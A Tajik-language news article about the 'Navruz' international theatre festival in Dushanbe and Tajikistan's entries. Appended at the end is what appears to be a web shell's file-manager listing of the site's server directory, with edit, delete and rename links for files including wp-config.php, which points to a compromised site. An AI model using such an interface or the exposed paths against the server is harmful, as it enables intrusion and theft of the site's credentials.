28.2 C
Душанбе

Баргузории ҷашнвораи байналмиллалии театри «Наврӯз». Тоҷикистонро чӣ намоишҳо муаррифӣ мекунанд?

Дар Душанбе аз 1-ум то 7-уми май ҷашнвораи байналмилалии театри «Наврӯз» барпо мегардад, ки дар он театрҳои 7 кишвар – Арманистон, Озарбойҷон, Русия, Қазоқистон, Ӯзбекистон, Эрон ва Тоҷикистон ширкат ва миёни ҳам рақобат мекунанд. Дар ин бора дафтари матбуотии Вазорати фарҳанги Тоҷикистон хабар дод.

Як манбаъ аз ин ниҳод ба adab.tj гуфт, ки дар ин ҷашнвора намоиши «Достони Сиёвуш»-и Намоишсарои Абулқосим Лоҳутӣ ва операи «Рӯдакӣ»-и Намоишсарои Садриддин Айнӣ аз Тоҷикистон вориди рақобат мешаванд.

Гуфта мешавад, ки Ҷашнвораи байналмилалии театри «Наврӯз» рӯзи 2-юми май, соати 17:30 дар Намоишсарои опера ва балети Садриддин Айнӣ ифтитоҳ шуда, маросими ҷоизасупории он рӯзи 6-уми май, соати 17:30 дар ҳамин театр сурат мегирад.

Манбаъ афзуд, намоишҳои озмунӣ дар саҳнаҳои Театри опера ва балети Садриддин Айнӣ, Театри академӣ-драмаи Абулқосим Лоҳутӣ ва Театри ҷавонони Маҳмудҷон Воҳидов пешкаши тамошобинон мегардад.

Гуфтанист, Ҷашнвораи байналмилалии театри «Наврӯз» аз соли 1990 то соли 2011 барпо мегардид, ки ҳамакнун он аз сар гирифта шуд.

Ёдоварӣ мекунем, ки рӯзҳои 14–21-уми апрел дар Душанбе Ҷашнвораи миллии театри «Парасту-2025» сурат гирифт, ки барандаи шоҳҷоизаи он намоиши «Достони Сиёвуш»-и Намоишсарои Абулқосим Лоҳутӣ гардид.

Сайидо ШАРАФӢ, «АС»

- Таблиғ -spot_img

Быть в курсе

Подпишитесь на обновления материалов сайта adab.tj на ваш электронный ящик.

- Таблиғ -spot_img

Хабарҳои охир

Акси гӯё

Бахшҳо

Current Dir: /var/www/adab.tj/html/

[FILE] .htaccess [ edit | delete | rename ]
[FILE] index.php [ edit | delete | rename ]
[FILE] license.txt [ edit | delete | rename ]
[FILE] readme.html [ edit | delete | rename ]
[FILE] wordpress-6.7.1-ru_RU.zip [ edit | delete | rename ]
[FILE] wp-activate.php [ edit | delete | rename ]
[DIR]  wp-admin [ delete | rename ]
[FILE] wp-blog-header.php [ edit | delete | rename ]
[FILE] wp-comments-post.php [ edit | delete | rename ]
[FILE] wp-config-sample.php [ edit | delete | rename ]
[FILE] wp-config.php [ edit | delete | rename ]
[DIR]  wp-content [ delete | rename ]
[FILE] wp-cron.php [ edit | delete | rename ]
[DIR]  wp-includes [ delete | rename ]
[FILE] wp-links-opml.php [ edit | delete | rename ]
[FILE] wp-load.php [ edit | delete | rename ]
[FILE] wp-login.php [ edit | delete | rename ]
[FILE] wp-mail.php [ edit | delete | rename ]
[FILE] wp-settings.php [ edit | delete | rename ]
[FILE] wp-signup.php [ edit | delete | rename ]
[FILE] wp-trackback.php [ edit | delete | rename ]
[DIR]  www [ delete | rename ]
[FILE] xmlrpc.php [ edit | delete | rename ]

Upload File: